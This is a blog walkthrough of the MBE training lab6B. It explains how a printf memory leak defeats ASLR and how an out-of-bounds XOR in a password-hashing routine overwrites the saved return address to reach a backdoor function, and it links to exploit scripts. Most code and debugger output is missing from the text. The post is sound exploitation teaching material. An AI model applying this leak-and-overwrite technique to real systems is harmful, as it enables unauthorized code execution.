The XOR madness of MBE's tricky lab6B - a walkthrough
This post is a continuation of my MBE (Modern Binary Exploitation) walkthrough series. In order to get some introduction, please see the previous post: https://hackingiscool.pl/mbe-lab6c-walkthrough/.
A look at the target app
So let's get right to it. The source code of the target application can be found here: https://github.com/RPISEC/MBE/blob/master/src/lab06/lab6B.c. The lab6B.readme reveales that this time we are not dealing with a suid binary. Instead, we are supposed to compromise a service running on port 6642.
Let's see if we can interact with it from our MBE VM command line:
Nice, it's working.
Running locally
Our target application is not actually capable of networking. This is covered by socat:
socat TCP-LISTEN:6642,reuseaddr,fork,su=lab6A EXEC:timeout 300 /levels/lab06/lab6B
For the purpose of better understanding of how the target program behaves and making its exploit development easier, let's compile our own version in /tmp.
The only change required is the hardcoded /home/lab6A/.pass path - with the assumption that we are doing our development from the MBE VM, using lab6B account (as we won't have the privileges to read it):
I just replaced it with pass.txt (the file needs to exist, be nonempty and readable for the program to work properly):
The source code overview
Now, the source code. Just like in lab6C.c, we have a 'secret_backdoor()' function here as well, so all we are gonna need is execution control:
Then we have the hash_pass() function. Takes two pointers to buffers (password and username) and XORs each byte of the password buffer the corresponding byte from the username buffer. The crucial property here is that the XOR operation will keep going until a nullbyte is encountered under password[i] index:
If a nullbyte is encountered under username[i] first, the rest of the password is XOR-ed with a hardcoded value of 0x44.
Then there's the lengthy load_pass() function, which simply reads the contents of the /home/lab6A/.pass file into the buffer pointed by the pointer passed as the only argument this function takes:
Now, this is how the main() function looks like:
It loads the local user password into the sercretpw buffer and hashes it with the hardcoded "lab6A" string (the target username). Then it calls the login_prompt() function, passing the original password size and the hash to it.
Then finally we have the login_prompt() function. It reads username and password to local buffers using strncpy() to only read maximum number of bytes up to the size of the current buffer to avoid overflow. Then it calls the hash_pass() function on the buffers. Then compares (memcmp()) the result with the password hash pointed by the pointer passed in the second login_prompt() argument, also making sure that it compares the exact number of bytes as it should (pwsize):
The first vuln
And honestly, I could not figure out where the vulnerability was. So I peeked into Corb3nik's solution https://github.com/Corb3nik/MBE-Solutions/blob/master/lab6b/solution.py only to notice the following part:
By the way, as the original version kept complaining about input arguments, before I read the usage comment, I simply modified it to make the 'remote' variant (hardcoded remote() method of interaction with hardcoded 127.0.0.1:6642): https://github.com/ewilded/MBE-snippets/blob/master/lab6B/solution.py. Either way, it works like a charm. Now let's find out how and why.
So, after sending the first set of credentials, the exploit is parsing the output from the application (p.recvline()) as a memory leak (individual byte ranges are saved in values with names corresponding to the names of local values stored on login_prompt()'s stack), right after encountering the "Authentication failed for user" string. This made me see the light and instantly revealed the first vulnerability - which by the way also makes the second vulnerability possible to exploit, but we'll get to that in due course.
The local readbuff buffer is 128 bytes-long. Both username and password are 32 bytes-long:
Now, what happens next is that fgets() reads a string from user input, saving it in the readbuff
buffer. To make the user input saved in readbuff
an actual string, fgets() will terminate it with a nullbyte. This means that if we provide, let's say, 60 characters of username, fgets() will make sure byte 61 is 0, so the string is terminated:
This itself is not an issue. However, what happens next is strncpy() blindly rewriting up to 32 bytes from readbuff
to username.
The same goes for password
.
This means that if we provide at least 32 bytes both as username and password, both 32-byte buffers, username
+ password
, create a continuous 64-byte block of memory without a single nullbyte. Depending on the values stored next to it (in this case attempts
and result
, and anything that follows, the continuous non-null memory block can be longer - and printable.
Every time after hash comparison fails, the address of the username
buffer is passed to a printf() call:
Provided with a pointer to the username buffer and the %s
formatting modifier, printf() will keep printing memory starting at username
and will only stop once it encounters a nullbyte on its way. Hence the memory leak necessary for us to obtain the information required to defeat ASLR (as we must provide the current, valid address of the login() function to EIP).
Running the app
Before we proceed any further, let's get the feel how all this data is aligned on the stack.
Let's put our first breakpoint here (betweeen strncpy() and hash_pass() calls):
Which would be this place in login_prompt() (at offset 278, right after the second strncpy() call is complete):
We can set a breakpoint on an offset, without first loading the program and using a full address, like below:
OK, run:
The breakpoint is hit let's have a look at the stack and identify what's what:
To confirm whether the value we think is the saved RET is in fact the saved RET, let's simply check the address of the next instruction after the login_prompt() call:
Yup. So we know how data is aligned on the stack when hash_pass() is about to be called.
Fair enough, let's create a second breakpoint - right after the hash_pass() call - to see how affects the values on the stack : break *(login_prompt+296)
):
And once it's hit, we can see that the password (originally consisting of capital 'C's) was hashed with the username (capital 'B's), as well as were the two integer values (attempts and result) and stuff that follows them:
Even the trailing 0x80002f78
was changed to 0x80002e79
in result of the XOR operation. The XOR stopped on the nullbyte in 0x80002e79
, leaving the 0x80 part intact.
At this point I got really worried about my understanding of the issue. How are we supposed to leak any memory layout information like the saved RET, saved EBP or anything revealing the current address base, if we encounter a nullbyte on our way earlier? We are always going to have nullbytes on our way with saved RET containing it due to the code segment base address containing such:
Then I noticed that the code segment has in fact a non-null base (just like the other maps) when we attach to an already running process instead of starting it from gdb (if you know the reason of this behavior please let me know).
As my goal was to figure out the exploitation myself and using Corb3nik's exploit for clues as last resort, I tried to develop the rest of the code myself, starting with this skeleton taken from his code:
https://github.com/ewilded/MBE-snippets/blob/master/lab6B/leaktest.py.
Setting the pwlib's context.log_level
variable to debug
makes gives a great additional feedback channel during exploit troubleshooting and development.
Here's a sample run of this exploit skeleton (note the entire [DEBUG]
output, the script itself does not print anything explicitly except for "The pid is: ..."):
By the way, because I wanted to attach gdb to the target process before inducing the out-of-bonds read (so I proceed from this point developing the exploit), I made it print out the PID and pause, waiting for a key to be pressed:
This way we can conveniently attach to the process from a second console:
Again, breakpoints:
And the stack (marked red saved RET, the address of the next instruction after login_prompt() call):
The second vuln
Now let's see how the stack changed after the first hash_password() call (breakpoint 2):
First, we have our username
buffer (32 bytes of 0x42
value) intact. Then we have the password
buffer. It's also 32 bytes, originally of 0xff
value we sent in our payload... now turned into 0xbd
.
The 32 bytes of password
got XOR-ed with their corresponding username
bytes. 0x42 XOR 0xff = 0xbd
. So far so good.
But what happens next, when i
becomes 32 and keeps incrementing, because no nullbyte was encountered under neither password[i]
or username[i]
?:
username[32]
points at password[0]
, username[33]
points at password[1]
and so on. And password[32]
points at result
, password[33]
points at attempts
and so on. XOR keeps XOR-ing.
Let's have a look at the two signed integer values (result and attempts), previously 0xffffffff
and 0xfffffffe
. Now they're 0x42424242
and 0x42424243
, respectively:
So, how did their bytes turn from 0xff
to 0x42
? Had they been XOR-ed with 0x42
(username), they would now be nullbytes (which we don't want, by the way), because any value XOR-ed with itself becomes 0
.
They were originally 0xff
and became ox42
because they were XOR-ed with 0xbd (to check what was the value they were XOR-ed with, we can simply XOR the current value with the old value, 0x42 XOR 0xff = 0xbd
):
So, the bytes that follow the password buffer (including the two integers, saved EBP and the saved RET) got XOR-ed with the contents of the password buffer... after the password buffer was XOR-ed with the username buffer.
And this is how we attained the second vulnerability - which, as we can see, allows us to change the saved RET!
Look again, the saved RET got changed as well (marked blue):
It's original value was 0xb77cdf7e, now it's 0x0ac162c3. Again, we can run simple test to see what was the value it got XOR-ed with:
Yup, it was 0xbd
(username
XOR password
).
So, the second vulnerability is an out-of-bond XOR in the hash_function().
A XOR with a buffer that we control. So it is effectively an out-of-bond write (a XOR-chained stack-based buffer overflow).
And funnily, it has the same root cause, which is relying on whether or not a particular consecutive byte is null instead of using a maximum size boundary for write.
Understanding the exploitation process and implementing it
In order to trigger both the out-of-bonds read and out-of-bonds XOR, we must provide 32 non-null bytes of username
and then 32 non-null bytes of password
.
Also, no byte at username[i]
can have its corresponding byte in password[i]
equal to it (that would lead to the relevant password[i]
becoming a nullbyte in result of the XOR operation, cutting us out from the further bytes on the stack).
This way the following things will happen:
1) password
will get XOR-ed with username
2) the bytes on the stack following the just XOR-ed password
buffer ( attempts
, result
, login_prompt() parameters, saved EBP and saved RET) will get XOR-ed with the new contents of the password
buffer - which is, again, what we provide as password then XOR-ed with what we provide as username.
3) Since this authentication attempt will fail, the printf() call will print out everything starting from the username
buffer through the XOR-ed password
to the rest of the values on the stack XOR-ed with the XOR-ed password up until a nullbyte is encountered.
So we use the out-of-bound printf() to actually obtain, among others, the saved RET. All these values are XOR-ed with the result of the username XOR password
operation.
At this point the program is in an incorrect state. The saved RET and saved EBP do not make sense. We will now how to trigger both vulnerabilities again with another authentication attempt, crafting the username
and the password
payloads in such a way that when the values on the stack (attempts
and saved RET) are XOR -ed with the password
buffer (which at that point will be the result of XOR between the username
and the password
we provide), they become the arbitrary values we WANT them to be.
Yes, in addition to the saved RET becoming the current address of the login() function, we also want to control the attempts
value, so the while
loop can end:
The login_prompt() function will not attempt to return until the loop ends. And the return call is how we gain execution control via saved RET overwrite.
What we need to do now is:
1) use the leaked values to calculate the login() address
2) craft the second username and password 32-byte payloads in such a way, that the current values on the stack (a copy of which we already got via the leak) - especially saved RET and attempts
- once XOR-ed with the password
buffer, become what we want them to be. Keeping in mind that the password
buffer will first get XOR-ed with the username
buffer, so we'll need to consider this order while preparing the payload.
All boils down to applying correct values and correct order of XOR-ing.
Let's start from the first payload again.
This time we'll use 'C' (0x43
) as username and 0x11
as password:
Now, reading the values from the leak:
We know they are XOR-ed with 0x52
, because 0x43
('C', the username) XOR-ed with 0x11
produces 0x52
. Again, these values can be arbitrary as long as they meet the conditions mentions above. And once they are picked, the following decoding and encoding will depend on these values.
We know that XOR-ing anything with the same value twice produces the same value back again. So:
0x43 XOR 0x11
= 0x52
0x52 XOR 0x11
= 0x43
Knowing that the hash_pass() encoded the stack variables with 0x52
, we XOR them with 0x52
to make them make sense again:
OK, time for the second payload. This time we'll use 'D' (0x44
) as username, only to emphasize that it can differ here.
Obtaining the offset of the login() function:
Calculate the current ASLR-ed address of the login() function by preserving 20 most significant bits from the original saved RET and adding the fixed offset 0xaf4
to it:
Now crafting the payloads for saved RET and attempts
. We want such a value, which, when XOR-ed with currently messed up saved RET on the stack, will become the new_ret
address. As we know the current value of the messed up saved RET (the xored_ret
variable), we XOR it the new_ret
and save it in new_ret_payload
. When this value gets XOR-ed with xored_ret
in one stack with a hash_pass() call, two XOR-s with xored_ret
will make that value equal new_ret
(this is why I titled it "madness"):
Now the attempts value. We decode it with the 0x52
key from the first attempt, increment it by one (to get past the last, third iteration of the while loop instead of having to perform another dummy authentication attempt) and encode it back :
Now, one last layer of encoding. Before sending, we need to XOR everything with the username
value we chose for the second attempt, so the hash_pass() call XOR-ing the password
with it will reverse this process, making those values ready to be XOR-ed against the rest of the stack:
And lastly, we assemble the payload, fill it up to 32-bytes with some arbitrary character (e.g. 'E') and send it:
And here we go. Triggering the leak and the first out-of-bonds XOR:
Receiving the leak:
Sending the second authentication attempt payload:
And we're done:
The full source code with comments can be found here:
https://github.com/ewilded/MBE-snippets/blob/master/lab6B/exploit_remote.py